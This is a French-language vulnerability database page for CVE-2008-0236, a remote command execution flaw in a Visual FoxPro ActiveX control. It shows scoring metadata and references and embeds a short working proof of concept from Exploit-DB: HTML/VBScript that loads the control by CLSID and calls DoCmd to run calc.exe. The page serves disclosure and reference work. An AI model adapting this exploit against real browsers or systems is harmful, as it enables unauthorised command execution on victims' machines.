CVE-2008-0236 : Détail

CVE-2008-0236

34.65%V4
Network
2008-01-11
01h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

An ActiveX control for Microsoft Visual FoxPro (vfp6r.dll 6.0.8862.0) allows remote attackers to execute arbitrary commands by invoking the DoCmd method.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5.8 AV:N/AC:M/Au:N/C:P/I:P/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 4873

Date de publication : 2008-01-08 23h00 +00:00
Auteur : shinnai
EDB Vérifié : Yes

<pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">----------------------------------------------------------------------------- <b>Microsoft FoxServer (vfp6r.dll 6.0.8862.0) Remote Command Execution</b> url: http://www.microsoft.com Author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org <b><font color='red'>This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage.</font></b> Not much more to say than using "DoCmd()" function, you can run applications passed as argument. Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 ----------------------------------------------------------------------------- <object classid='clsid:008B6010-1F3D-11D1-B0C8-00A0C9055D74' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.DoCmd "RUN calc.exe" End Sub </script> </span></span> </code></pre> # milw0rm.com [2008-01-09]

Products Mentioned

Configuraton 0

Microsoft>>Visual_foxpro >> Version 6.0

Références

http://secunia.com/advisories/28417
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/27205
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/4873
Tags : exploit, x_refsource_EXPLOIT-DB